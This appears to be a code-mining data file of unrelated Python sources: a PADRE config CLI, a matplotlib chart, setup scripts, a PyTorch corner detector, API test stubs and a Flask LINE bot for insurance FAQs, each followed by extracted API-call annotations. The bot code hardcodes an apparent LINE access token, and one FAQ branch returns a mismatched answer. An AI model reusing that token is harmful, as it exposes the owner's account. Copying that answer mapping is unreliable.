TextColumn, BarColumn, TimeElapsedColumn, TimeRemainingColumn\n'), ((3395, 3416), 'rich.progress.TimeRemainingColumn', 'TimeRemainingColumn', ([], {}), '()\n', (3414, 3416), False, 'from rich.progress import Progress, TextColumn, BarColumn, TimeElapsedColumn, TimeRemainingColumn\n'), ((5072, 5085), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (5083, 5085), False, 'import io\n'), ((5529, 5569), 'numpy.load', 'np.load', (['check_golden'], {'allow_pickle': '(True)'}), '(check_golden, allow_pickle=True)\n', (5536, 5569), True, 'import numpy as np\n'), ((2202, 2248), 're.split', 're.split', (['"""\\\\s*,\\\\s*"""', 'generator_info_list[no]'], {}), "('\\\\s*,\\\\s*', generator_info_list[no])\n", (2210, 2248), False, 'import re\n'), ((13770, 13783), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (13781, 13783), False, 'import io\n'), ((14833, 14859), 'multiprocessing.Pool', 'Pool', ([], {'processes': 'args.nproc'}), '(processes=args.nproc)\n', (14837, 14859), False, 'from multiprocessing import Pool, Manager, Condition, Value, Process\n'), ((15438, 15460), 'os.system', 'os.system', (['"""stty sane"""'], {}), "('stty sane')\n", (15447, 15460), False, 'import os\n'), ((16353, 16375), 'os.system', 'os.system', (['"""stty sane"""'], {}), "('stty sane')\n", (16362, 16375), False, 'import os\n'), ((16384, 16396), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (16392, 16396), False, 'import sys\n'), ((1285, 1296), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1293, 1296), False, 'import sys\n'), ((4637, 4652), 'time.sleep', 'time.sleep', (['(0.5)'], {}), '(0.5)\n', (4647, 4652), False, 'import time\n'), ((6887, 6965), 'subprocess.check_output', 'subprocess.check_output', (["(read_elf_cmd + ' | grep begin_signature ')"], {'shell': '(True)'}), "(read_elf_cmd + ' | grep begin_signature ', shell=True)\n", (6910, 6965), False, 'import subprocess\n'), ((13687, 13700), 'io.StringIO', 'io.StringIO', ([], {}), '()\n', (13698, 13700), False, 'import io\n'), ((15601, 15612), 
'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (15609, 15612), False, 'import sys\n'), ((16085, 16097), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (16093, 16097), False, 'import sys\n'), ((8590, 8646), 'os.makedirs', 'os.makedirs', (['f"""build/{test_case[\'name\']}"""'], {'exist_ok': '(True)'}), '(f"build/{test_case[\'name\']}", exist_ok=True)\n', (8601, 8646), False, 'import os\n'), ((13811, 13825), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (13823, 13825), False, 'import sys\n'), ((11891, 11947), 'os.makedirs', 'os.makedirs', (['f"""build/{test_case[\'name\']}"""'], {'exist_ok': '(True)'}), '(f"build/{test_case[\'name\']}", exist_ok=True)\n', (11902, 11947), False, 'import os\n'), ((13974, 13988), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (13986, 13988), False, 'import sys\n'), ((7409, 7504), 'subprocess.check_output', 'subprocess.check_output', (['(read_elf_cmd + f" | grep test_{test_case[\'no\']}_data ")'], {'shell': '(True)'}), '(read_elf_cmd +\n f" | grep test_{test_case[\'no\']}_data ", shell=True)\n', (7432, 7504), False, 'import subprocess\n'), ((13943, 13957), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (13955, 13957), False, 'import sys\n')]
|
"""
Command Line Interface for PADRE.
"""
import click
from pypadre.pod.app import PadreConfig
from pypadre.pod.app.padre_app import PadreAppFactory
@click.group()
def config():
    """
    Commands for the configuration.

    Default config file: ~/.padre.cfg
    """
def _get_app(ctx) -> PadreConfig:
    """Fetch the PadreConfig instance stored on the click context object."""
    config_app = ctx.obj["config-app"]
    return config_app
@config.command(name="get")
@click.option('--param', default=None, help='Get value of given param')
@click.option('--section', default=None, help='Get value from given section')
@click.pass_context
def get(ctx, param, section):
"""
commands for the configuration
Default config file: ~/.padre.cfg
"""
if section is None:
result = _get_app(ctx).get(param)
else:
result = _get_app(ctx).get(param, section=section)
print(result)
@config.command(name="set")
@click.option('--param', nargs=2, default=None, help='key value pair as tuple')
@click.option('--section', default=None, help='Set key, value for given section')
@click.pass_context
def set_config_param(ctx, param, section):
"""
Sets key, value in config. param must be a tuple
"""
if section is None:
_get_app(ctx).set(param[0], param[1])
else:
_get_app(ctx).set(param[0], param[1], section)
_get_app(ctx).save()
# Reinitialize app with changed configuration
ctx.obj['pypadre-app'] = PadreAppFactory.get(_get_app(ctx))
@config.command(name="list")
@click.option('--section', default=None, help='Get list of params from given section')
@click.pass_context
def list_config_params(ctx, section):
"""
List all values in config
"""
if section is None:
result = _get_app(ctx).config['GENERAL'].keys()
else:
result = _get_app(ctx).config[section].keys()
print(result)
|
[
"click.group",
"click.option"
] |
[((154, 167), 'click.group', 'click.group', ([], {}), '()\n', (165, 167), False, 'import click\n'), ((373, 443), 'click.option', 'click.option', (['"""--param"""'], {'default': 'None', 'help': '"""Get value of given param"""'}), "('--param', default=None, help='Get value of given param')\n", (385, 443), False, 'import click\n'), ((445, 521), 'click.option', 'click.option', (['"""--section"""'], {'default': 'None', 'help': '"""Get value from given section"""'}), "('--section', default=None, help='Get value from given section')\n", (457, 521), False, 'import click\n'), ((846, 924), 'click.option', 'click.option', (['"""--param"""'], {'nargs': '(2)', 'default': 'None', 'help': '"""key value pair as tuple"""'}), "('--param', nargs=2, default=None, help='key value pair as tuple')\n", (858, 924), False, 'import click\n'), ((926, 1011), 'click.option', 'click.option', (['"""--section"""'], {'default': 'None', 'help': '"""Set key, value for given section"""'}), "('--section', default=None, help='Set key, value for given section'\n )\n", (938, 1011), False, 'import click\n'), ((1446, 1536), 'click.option', 'click.option', (['"""--section"""'], {'default': 'None', 'help': '"""Get list of params from given section"""'}), "('--section', default=None, help=\n 'Get list of params from given section')\n", (1458, 1536), False, 'import click\n')]
|
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
#create multindex dataframe
arrays = [['Fruit', 'Fruit', 'Fruit', 'Veggies', 'Veggies', 'Veggies'],
['Bananas', 'Oranges', 'Pears', 'Carrots', 'Potatoes', 'Celery']]
index = pd.MultiIndex.from_tuples(list(zip(*arrays)))
df = pd.DataFrame(np.random.randint(10, 50, size=(1, 6)), columns=index)
#plotting
fig, axes = plt.subplots(nrows=1, ncols=2, sharey=True, figsize=(14 / 2.54, 10 / 2.54)) # width, height
for i, col in enumerate(df.columns.levels[0]):
print(col)
ax = axes[i]
df[col].T.plot(ax=ax, kind='bar', width=.8)
ax.legend_.remove()
ax.set_xlabel(col, weight='bold')
ax.yaxis.grid(b=True, which='major', color='black', linestyle='--', alpha=.4)
ax.set_axisbelow(True)
for tick in ax.get_xticklabels():
tick.set_rotation(0)
#make the ticklines invisible
ax.tick_params(axis=u'both', which=u'both', length=0)
plt.tight_layout()
# remove spacing in between
fig.subplots_adjust(wspace=0) # space between plots
plt.show()
|
[
"matplotlib.pyplot.tight_layout",
"numpy.random.randint",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.show"
] |
[((398, 473), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {'nrows': '(1)', 'ncols': '(2)', 'sharey': '(True)', 'figsize': '(14 / 2.54, 10 / 2.54)'}), '(nrows=1, ncols=2, sharey=True, figsize=(14 / 2.54, 10 / 2.54))\n', (410, 473), True, 'import matplotlib.pyplot as plt\n'), ((943, 961), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (959, 961), True, 'import matplotlib.pyplot as plt\n'), ((1044, 1054), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1052, 1054), True, 'import matplotlib.pyplot as plt\n'), ((320, 358), 'numpy.random.randint', 'np.random.randint', (['(10)', '(50)'], {'size': '(1, 6)'}), '(10, 50, size=(1, 6))\n', (337, 358), True, 'import numpy as np\n')]
|
from setuptools import setup, find_packages
requires = []
setup(
name='izon',
version='2018.5.24',
description='A dependency handling tool for files',
url='https://github.com/kmu/izon',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
keywords='dependency time',
packages=find_packages(),
install_requires=requires,
classifiers=[
'Topic :: System :: Filesystems',
],
)
|
[
"setuptools.find_packages"
] |
[((317, 332), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (330, 332), False, 'from setuptools import setup, find_packages\n')]
|
#!/usr/bin/env python
import setuptools
import os
os.chmod("examples/run.py", 0o744)
os.chmod("examples/run_MNIST.py", 0o744)
os.chmod("examples/run_distributed.py", 0o744)
setuptools.setup(
name="hamiltonianNet",
version="0.0.1",
author="<NAME>",
author_email="<EMAIL>",
description="PyTorch package for Hamiltonian DNNs",
url="https://github.com/ClaraGalimberti/hamiltonianNet",
packages=setuptools.find_packages(),
install_requires=['torch>=1.4.0',
'numpy>=1.18.1',
'matplotlib>=3.1.3',
'torchvision>=0.5.0'],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
],
python_requires='>=3.6',
)
|
[
"os.chmod",
"setuptools.find_packages"
] |
[((52, 84), 'os.chmod', 'os.chmod', (['"""examples/run.py"""', '(484)'], {}), "('examples/run.py', 484)\n", (60, 84), False, 'import os\n'), ((87, 125), 'os.chmod', 'os.chmod', (['"""examples/run_MNIST.py"""', '(484)'], {}), "('examples/run_MNIST.py', 484)\n", (95, 125), False, 'import os\n'), ((128, 172), 'os.chmod', 'os.chmod', (['"""examples/run_distributed.py"""', '(484)'], {}), "('examples/run_distributed.py', 484)\n", (136, 172), False, 'import os\n'), ((421, 447), 'setuptools.find_packages', 'setuptools.find_packages', ([], {}), '()\n', (445, 447), False, 'import setuptools\n')]
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
class CornerDet(nn.Module):
def __init__(self):
super(CornerDet, self).__init__()
def forward(self, x_f):
raise NotImplementedError
class SepCornerDet(CornerDet):
def __init__(self, feat_in=256):
super(SepCornerDet, self).__init__()
self.up0_l = nn.Sequential(
nn.Conv2d(feat_in, 256, 3, padding=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.Conv2d(256, 64, 1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
)
self.up1_l = nn.Sequential(
nn.Conv2d(64, 64, 3, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
nn.Conv2d(64, 32, 1),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True),
)
self.up2_l = nn.Sequential(
nn.Conv2d(32, 32, 3, padding=1),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True),
nn.Conv2d(32, 1, 1),
)
self.up0_r = nn.Sequential(
nn.Conv2d(feat_in, 256, 3, padding=1),
nn.BatchNorm2d(256),
nn.ReLU(inplace=True),
nn.Conv2d(256, 64, 1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
)
self.up1_r = nn.Sequential(
nn.Conv2d(64, 64, 3, padding=1),
nn.BatchNorm2d(64),
nn.ReLU(inplace=True),
nn.Conv2d(64, 32, 1),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True),
)
self.up2_r = nn.Sequential(
nn.Conv2d(32, 32, 3, padding=1),
nn.BatchNorm2d(32),
nn.ReLU(inplace=True),
nn.Conv2d(32, 1, 1),
)
for m in self.modules():
if isinstance(m, (nn.Conv2d, nn.ConvTranspose2d, nn.Linear)):
nn.init.kaiming_normal_(
m.weight.data, mode='fan_out', nonlinearity='relu')
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1.0)
m.bias.data.zero_()
def forward(self, x_f):
x_f_l, x_f_r = x_f
x_f_l = self.up0_l(x_f_l)
resolution = x_f_l.shape[-1]
x_f_l = self.up1_l(F.interpolate(
x_f_l, size=(resolution*2+1, resolution*2+1)))
resolution = x_f_l.shape[-1]
heat_map_l = self.up2_l(F.interpolate(
x_f_l, size=(resolution*2+1, resolution*2+1)))
batch_sz = x_f_l.shape[0]
left_top_map = F.softmax(heat_map_l.squeeze().reshape(batch_sz, -1), 1).reshape(
batch_sz, heat_map_l.shape[-2], heat_map_l.shape[-1])
x_f_r = self.up0_r(x_f_r)
resolution = x_f_r.shape[-1]
x_f_r = self.up1_r(F.interpolate(
x_f_r, size=(resolution*2+1, resolution*2+1)))
resolution = x_f_r.shape[-1]
heat_map_r = self.up2_r(F.interpolate(
x_f_r, size=(resolution*2+1, resolution*2+1)))
batch_sz = x_f_r.shape[0]
right_bottom_map = F.softmax(heat_map_r.squeeze().reshape(batch_sz, -1), 1).reshape(
batch_sz, heat_map_r.shape[-2], heat_map_r.shape[-1])
heatmap_size = left_top_map.shape[-1]
xx, yy = np.meshgrid([dx for dx in range(int(heatmap_size))],
[dy for dy in range(int(heatmap_size))])
heatmap_xx = torch.from_numpy(xx).float().cuda()
heatmap_yy = torch.from_numpy(yy).float().cuda()
x1 = ((left_top_map * heatmap_xx).sum(-1).sum(-1) /
heatmap_xx.shape[-1]).reshape(-1, 1)
y1 = ((left_top_map * heatmap_yy).sum(-1).sum(-1) /
heatmap_xx.shape[-2]).reshape(-1, 1)
x2 = ((right_bottom_map * heatmap_xx).sum(-1).sum(-1) /
heatmap_xx.shape[-1]).reshape(-1, 1)
y2 = ((right_bottom_map * heatmap_yy).sum(-1).sum(-1) /
heatmap_xx.shape[-2]).reshape(-1, 1)
result_target = torch.cat((x1, y1, x2, y2), 1)
return result_target, left_top_map.shape[-1]
|
[
"torch.nn.ReLU",
"torch.nn.init.kaiming_normal_",
"torch.nn.Conv2d",
"torch.cat",
"torch.nn.BatchNorm2d",
"torch.nn.functional.interpolate",
"torch.from_numpy"
] |
[((3995, 4025), 'torch.cat', 'torch.cat', (['(x1, y1, x2, y2)', '(1)'], {}), '((x1, y1, x2, y2), 1)\n', (4004, 4025), False, 'import torch\n'), ((409, 446), 'torch.nn.Conv2d', 'nn.Conv2d', (['feat_in', '(256)', '(3)'], {'padding': '(1)'}), '(feat_in, 256, 3, padding=1)\n', (418, 446), True, 'import torch.nn as nn\n'), ((460, 479), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(256)'], {}), '(256)\n', (474, 479), True, 'import torch.nn as nn\n'), ((493, 514), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (500, 514), True, 'import torch.nn as nn\n'), ((528, 549), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(64)', '(1)'], {}), '(256, 64, 1)\n', (537, 549), True, 'import torch.nn as nn\n'), ((563, 581), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(64)'], {}), '(64)\n', (577, 581), True, 'import torch.nn as nn\n'), ((595, 616), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (602, 616), True, 'import torch.nn as nn\n'), ((677, 708), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(64)', '(3)'], {'padding': '(1)'}), '(64, 64, 3, padding=1)\n', (686, 708), True, 'import torch.nn as nn\n'), ((722, 740), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(64)'], {}), '(64)\n', (736, 740), True, 'import torch.nn as nn\n'), ((754, 775), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (761, 775), True, 'import torch.nn as nn\n'), ((789, 809), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(32)', '(1)'], {}), '(64, 32, 1)\n', (798, 809), True, 'import torch.nn as nn\n'), ((823, 841), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(32)'], {}), '(32)\n', (837, 841), True, 'import torch.nn as nn\n'), ((855, 876), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (862, 876), True, 'import torch.nn as nn\n'), ((937, 968), 'torch.nn.Conv2d', 'nn.Conv2d', (['(32)', '(32)', '(3)'], {'padding': '(1)'}), '(32, 32, 3, padding=1)\n', (946, 968), True, 'import torch.nn as nn\n'), ((982, 1000), 
'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(32)'], {}), '(32)\n', (996, 1000), True, 'import torch.nn as nn\n'), ((1014, 1035), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (1021, 1035), True, 'import torch.nn as nn\n'), ((1049, 1068), 'torch.nn.Conv2d', 'nn.Conv2d', (['(32)', '(1)', '(1)'], {}), '(32, 1, 1)\n', (1058, 1068), True, 'import torch.nn as nn\n'), ((1129, 1166), 'torch.nn.Conv2d', 'nn.Conv2d', (['feat_in', '(256)', '(3)'], {'padding': '(1)'}), '(feat_in, 256, 3, padding=1)\n', (1138, 1166), True, 'import torch.nn as nn\n'), ((1180, 1199), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(256)'], {}), '(256)\n', (1194, 1199), True, 'import torch.nn as nn\n'), ((1213, 1234), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (1220, 1234), True, 'import torch.nn as nn\n'), ((1248, 1269), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(64)', '(1)'], {}), '(256, 64, 1)\n', (1257, 1269), True, 'import torch.nn as nn\n'), ((1283, 1301), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(64)'], {}), '(64)\n', (1297, 1301), True, 'import torch.nn as nn\n'), ((1315, 1336), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (1322, 1336), True, 'import torch.nn as nn\n'), ((1397, 1428), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(64)', '(3)'], {'padding': '(1)'}), '(64, 64, 3, padding=1)\n', (1406, 1428), True, 'import torch.nn as nn\n'), ((1442, 1460), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(64)'], {}), '(64)\n', (1456, 1460), True, 'import torch.nn as nn\n'), ((1474, 1495), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (1481, 1495), True, 'import torch.nn as nn\n'), ((1509, 1529), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(32)', '(1)'], {}), '(64, 32, 1)\n', (1518, 1529), True, 'import torch.nn as nn\n'), ((1543, 1561), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(32)'], {}), '(32)\n', (1557, 1561), True, 'import torch.nn as nn\n'), ((1575, 1596), 
'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (1582, 1596), True, 'import torch.nn as nn\n'), ((1657, 1688), 'torch.nn.Conv2d', 'nn.Conv2d', (['(32)', '(32)', '(3)'], {'padding': '(1)'}), '(32, 32, 3, padding=1)\n', (1666, 1688), True, 'import torch.nn as nn\n'), ((1702, 1720), 'torch.nn.BatchNorm2d', 'nn.BatchNorm2d', (['(32)'], {}), '(32)\n', (1716, 1720), True, 'import torch.nn as nn\n'), ((1734, 1755), 'torch.nn.ReLU', 'nn.ReLU', ([], {'inplace': '(True)'}), '(inplace=True)\n', (1741, 1755), True, 'import torch.nn as nn\n'), ((1769, 1788), 'torch.nn.Conv2d', 'nn.Conv2d', (['(32)', '(1)', '(1)'], {}), '(32, 1, 1)\n', (1778, 1788), True, 'import torch.nn as nn\n'), ((2300, 2367), 'torch.nn.functional.interpolate', 'F.interpolate', (['x_f_l'], {'size': '(resolution * 2 + 1, resolution * 2 + 1)'}), '(x_f_l, size=(resolution * 2 + 1, resolution * 2 + 1))\n', (2313, 2367), True, 'import torch.nn.functional as F\n'), ((2443, 2510), 'torch.nn.functional.interpolate', 'F.interpolate', (['x_f_l'], {'size': '(resolution * 2 + 1, resolution * 2 + 1)'}), '(x_f_l, size=(resolution * 2 + 1, resolution * 2 + 1))\n', (2456, 2510), True, 'import torch.nn.functional as F\n'), ((2806, 2873), 'torch.nn.functional.interpolate', 'F.interpolate', (['x_f_r'], {'size': '(resolution * 2 + 1, resolution * 2 + 1)'}), '(x_f_r, size=(resolution * 2 + 1, resolution * 2 + 1))\n', (2819, 2873), True, 'import torch.nn.functional as F\n'), ((2949, 3016), 'torch.nn.functional.interpolate', 'F.interpolate', (['x_f_r'], {'size': '(resolution * 2 + 1, resolution * 2 + 1)'}), '(x_f_r, size=(resolution * 2 + 1, resolution * 2 + 1))\n', (2962, 3016), True, 'import torch.nn.functional as F\n'), ((1924, 1999), 'torch.nn.init.kaiming_normal_', 'nn.init.kaiming_normal_', (['m.weight.data'], {'mode': '"""fan_out"""', 'nonlinearity': '"""relu"""'}), "(m.weight.data, mode='fan_out', nonlinearity='relu')\n", (1947, 1999), True, 'import torch.nn as nn\n'), ((3424, 3444), 
'torch.from_numpy', 'torch.from_numpy', (['xx'], {}), '(xx)\n', (3440, 3444), False, 'import torch\n'), ((3481, 3501), 'torch.from_numpy', 'torch.from_numpy', (['yy'], {}), '(yy)\n', (3497, 3501), False, 'import torch\n')]
|
# coding: utf-8
"""
Layered Insight Scan
Layered Insight Scan performs static vulnerability analysis, license and package compliance. You can find out more about Scan at http://layeredinsight.com.
OpenAPI spec version: 0.9.4
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import layint_scan_api
from layint_scan_api.rest import ApiException
from layint_scan_api.apis.registry_api import RegistryApi
class TestRegistryApi(unittest.TestCase):
""" RegistryApi unit test stubs """
def setUp(self):
self.api = layint_scan_api.apis.registry_api.RegistryApi()
def tearDown(self):
pass
def test_add_ecr_creds(self):
"""
Test case for add_ecr_creds
Add credentials for AWS ECR
"""
pass
def test_add_registry(self):
"""
Test case for add_registry
Add a new registry
"""
pass
def test_delete_registry(self):
"""
Test case for delete_registry
Deletes a registry
"""
pass
def test_get_registries(self):
"""
Test case for get_registries
List all registries available to the user
"""
pass
def test_get_registry_by_id(self):
"""
Test case for get_registry_by_id
Find registry by ID
"""
pass
def test_update_registry(self):
"""
Test case for update_registry
Updates a registry with form data
"""
pass
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"layint_scan_api.apis.registry_api.RegistryApi"
] |
[((1668, 1683), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1681, 1683), False, 'import unittest\n'), ((667, 714), 'layint_scan_api.apis.registry_api.RegistryApi', 'layint_scan_api.apis.registry_api.RegistryApi', ([], {}), '()\n', (712, 714), False, 'import layint_scan_api\n')]
|
from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort
from getData.runAIML import runAIML
import re
from linebot import (
LineBotApi, WebhookHandler
)
from linebot.exceptions import (
InvalidSignatureError
)
from linebot.models import *
application = Flask(__name__, static_url_path='', template_folder='templates')
line_bot_api = LineBotApi('9fDKzAaq/ia4Zi0yQwuTEnGM9A+vJj8aUqGE74mo1Qp6gmgs0ALwcJnGE15molA+aI8sRwyK1G67ar+cVDjvNg6lp8gBP98N3BQpqaIm4/pTS9KD1XvHq6PnRsR/UL/TYHzhv8vw3FOi/7dNwgzuPQdB04t89/1O/w1cDnyilFU=')
handler = WebhookHandler('<KEY>')
@application.route("/")
def index():
return render_template('index.html')
@application.route('/img/<path:path>')
def send_img(path):
return send_from_directory('img', path)
@application.route('/statics/<path:path>')
def send_statics(path):
return send_from_directory('statics', path)
@application.route('/_add_numbers')
def add_numbers():
query = request.args.get('query')
query = query.upper()
query = re.sub('臺','台',query)
reply = '我不知道你在說什麼'
try:
#請問本公司之續次保費繳費方式有哪些?
if(re.search('續', query)!=None):
if (re.search('保費|保險費', query)!=None):
if (re.search('繳', query)!=None):
reply = '本公司之續次保費繳費方式:人員收費、金融機構轉帳、信用卡代繳、保戶自行繳費(如郵撥..)'
#我收到繳費通知,但沒有人來收保費應該怎麼辦?
elif(re.search('沒有', query)!=None):
if (re.search('收', query)!=None):
if (re.search('保費', query)!=None):
reply = '1. 您可以依繳費通知上記載之收費單位地址、電話逕與收費人員連絡。 2. 您可以撥打保戶服務專線0809-000-550與本公司連絡,來電時請留下保單號碼、電話及地址,以便通知收費人員與您連絡。'
#請問支票抬頭應如何開立?
elif(re.search('支票', query)!=None):
if (re.search('抬頭', query)!=None):
reply = '本公司之續次保費繳費方式:人員收費、金融機構轉帳、信用卡代繳、保戶自行繳費(如郵撥..)'
#我若移居國外,其收費情形應如何處理?
elif(re.search('國外', query)!=None):
if (re.search('收費', query)!=None):
reply = '本公司在國外並未設立營業據點,無法受理保戶將收費地址變更至國外,所以保戶移居國外,仍須於國內留有收費地址,可委託國內之親友代繳或以自動轉帳、信用卡方式扣繳保費(仍須於國內設有轉帳帳戶)。'
#我的保單服務員是誰?
elif(re.search('保單', query)!=None):
if (re.search('服務員', query)!=None):
reply = '富邦金控官網中的「人壽保戶會員專區」有提供保單相關資料的查詢。您必須是富邦保戶並申請加入會員,即可透過網路查詢到以您為要保人的相關保單資料。'
#要、被保人非同一人,要保人不幸死亡,應如何變更要保人?
elif(re.search('要保人', query)!=None):
if (re.search('死亡', query)!=None):
reply = '原要保人死亡時,該保險契約視同要保人之遺產,應由其繼承人中推舉一與被保險人具“保險利益”(依保險法第十六條規定)者繼承該保單。應備文件如下:(1) 契約變更申請書。 (2) 原要保人死亡證明或除戶證明。 (3) 全部戶籍謄本(以認定其所有繼承人)。 (4) 法定繼承人聲明同意書:原要保人之所有法定繼承人,一一於同意書親自簽章,以聲明同意讓受該保險契約由所指定之新要保人持有。'
#保險單上要保人或被保險人姓名、出生日期、性別或身分證號碼錯誤時,應如何處理?
elif(re.search('錯誤', query)!=None):
if (re.search('姓名|生日|姓別|身分證|資料', query)!=None):
reply = '要保書填載錯誤:(1) 請檢附契約變更申請書及證明文件,依變更程序辦理。 (2) 出生日期更正,如涉及保險年齡異動,則依變更後保險年齡重新計算保險費,並依保單條款規定補退保費差額;變更後契約內容依投保規定辦理。(3) 性別更正,依變更後性別重新計算保險費,並補退保費差額。'
#要保人(或被保險人)更改名時,應如何處理?
elif(re.search('更改|變更|更|改', query)!=None):
if (re.search('姓名|名', query)!=None):
reply = '1. 請檢附契約變更申請書及戶籍謄本,依變更程序辦理。 2. 於要保人(或被保險人)簽章處簽立原姓名(即要保書原留樣式)及更改後之姓名。'
#保險費自動墊繳意願應如何變更?
elif(re.search('保費|保險費', query)!=None):
if (re.search('自動墊繳意願', query)!=None):
reply = '1. 隨時均可提出申請,但若保單已進入自動墊繳,現欲變更為停止保險費自動墊繳,則墊繳意願變更之生效日為次一墊繳日。 2. 應備妥「契約變更申請書」,由要保人提出申請。'
#被保險人職業內容變動該如何辦理?
elif(re.search('職業|工作', query)!=None):
if (re.search('更改|變更|變動|換', query)!=None):
reply = '被保險人之實際工作內容有變動時,保戶應即時以書面通知保險公司,填寫契約變更申請書辦理變更。'
#如何辦理地址之變更?
#受益人可否變更?應如何申請?
#保戶欲辦理變更為「減額繳清保險」應如何辦理?
#保戶欲辦理變更為「展期定期保險」應如何辦理?
#辦理繳別變更,應備什麼文件及注意事項?
#何謂繳費方式變更?
#保單遺失如何申請補發?
#主契約保險金額之縮小應如何提出申請?
#投保當時如無附加一年期附約,中途可否附加?
#保戶若申請附約取消或縮小保額時,可否退費?
#保戶若申請附約新加保,應如何辦理?
#主契約可轉換之作業與險種規定為何?
#什麼情形不得申請轉換契約?
else:
query = query.upper()
response = runAIML(query)
if response != '':
reply = response
else:
raise Exception
except Exception as e:
print(e)
pass
return jsonify(result=reply)
@application.route("/callback", methods=['POST'])
def callback():
# get X-Line-Signature header value
signature = request.headers['X-Line-Signature']
# get request body as text
body = request.get_data(as_text=True)
# print("body:",body)
application.logger.info("Request body: " + body)
# handle webhook body
try:
handler.handle(body, signature)
except InvalidSignatureError:
abort(400)
return 'ok'
if __name__ == "__main__":
application.run()
|
[
"getData.runAIML.runAIML",
"flask.request.args.get",
"flask.Flask",
"linebot.LineBotApi",
"flask.abort",
"flask.jsonify",
"flask.request.get_data",
"flask.render_template",
"re.search",
"flask.send_from_directory",
"re.sub",
"linebot.WebhookHandler"
] |
[((310, 374), 'flask.Flask', 'Flask', (['__name__'], {'static_url_path': '""""""', 'template_folder': '"""templates"""'}), "(__name__, static_url_path='', template_folder='templates')\n", (315, 374), False, 'from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort\n'), ((391, 587), 'linebot.LineBotApi', 'LineBotApi', (['"""9fDKzAaq/ia4Zi0yQwuTEnGM9A+vJj8aUqGE74mo1Qp6gmgs0ALwcJnGE15molA+aI8sRwyK1G67ar+cVDjvNg6lp8gBP98N3BQpqaIm4/pTS9KD1XvHq6PnRsR/UL/TYHzhv8vw3FOi/7dNwgzuPQdB04t89/1O/w1cDnyilFU="""'], {}), "(\n '9fDKzAaq/ia4Zi0yQwuTEnGM9A+vJj8aUqGE74mo1Qp6gmgs0ALwcJnGE15molA+aI8sRwyK1G67ar+cVDjvNg6lp8gBP98N3BQpqaIm4/pTS9KD1XvHq6PnRsR/UL/TYHzhv8vw3FOi/7dNwgzuPQdB04t89/1O/w1cDnyilFU='\n )\n", (401, 587), False, 'from linebot import LineBotApi, WebhookHandler\n'), ((588, 611), 'linebot.WebhookHandler', 'WebhookHandler', (['"""<KEY>"""'], {}), "('<KEY>')\n", (602, 611), False, 'from linebot import LineBotApi, WebhookHandler\n'), ((662, 691), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (677, 691), False, 'from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort\n'), ((763, 795), 'flask.send_from_directory', 'send_from_directory', (['"""img"""', 'path'], {}), "('img', path)\n", (782, 795), False, 'from flask import Flask, send_file, send_from_directory, request, jsonify, render_template, abort\n'), ((875, 911), 'flask.send_from_directory', 'send_from_directory', (['"""statics"""', 'path'], {}), "('statics', path)\n", 